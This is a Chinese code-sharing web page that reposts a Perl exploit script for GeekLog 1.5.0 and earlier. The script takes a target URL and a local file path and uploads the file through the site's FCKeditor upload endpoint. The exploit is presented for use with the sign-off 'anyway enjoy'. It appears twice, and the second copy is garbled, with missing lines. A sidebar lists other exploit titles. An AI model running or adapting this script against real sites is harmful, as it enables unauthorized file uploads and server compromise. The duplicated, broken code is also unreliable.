您现在的位置是:网站首页> 编程资料编程资料
GeekLog _Exploit_网络安全_
2023-05-24
396人已围观
简介 GeekLog _Exploit_网络安全_
#!/usr/bin/perl use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common; print <
GeekLog <= 1.5.0 Remote Arbitrary File Upload
Discovered && Coded By: t0pP8uZz
0day?!?Most sites need custom configuration files
for this exploit to actually work, anyway enjoy
Discovered On: 20 August 2008 / milw0rm.com
Script Download: http://www.geeklog.net
INTRO print "Enter URL(ie: http://site.com): ";
chomp(my $url=);
print "Enter File Path(path to local file to upload): ";
chomp(my $file=); my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/fckeditor/editor/filemanager/upload/php/upload.php',
Content_Type => 'form-data',
Content => [ NewFile => $file ] ); if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; } exit;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common; print <
GeekLog <= 1.5.0 Remote Arbitrary File Upload
Discovered && Coded By: t0pP8uZz
0day?!?Most sites need custom configuration files
for this exploit to actually work, anyway enjoy
Discovered On: 20 August 2008 / milw0rm.com
Script Download: http://www.geeklog.net
INTRO print "Enter URL(ie: http://site.com): ";
chomp(my $url=
print "Enter File Path(path to local file to upload): ";
chomp(my $file=
my $re = $ua->request(POST $url.'/fckeditor/editor/filemanager/upload/php/upload.php',
Content_Type => 'form-data',
Content => [ NewFile => $file ] ); if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; } exit;
相关内容
- Dana IRC 1.4a Remote Buffer Overflow Exploit _Exploit_网络安全_
- Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit _Exploit_网络安全_
- Simple PHP Blog (SPHPBlog) _Exploit_网络安全_
- Acoustica Mixcraft _Exploit_网络安全_
- MyBulletinBoard (MyBB) _Exploit_网络安全_
- Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit _Exploit_网络安全_
- Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit _Exploit_网络安全_
- pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit _Exploit_网络安全_
- Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit _Exploit_网络安全_
- The Personal FTP Server 6.0f RETR Denial of Service Exploit _Exploit_网络安全_
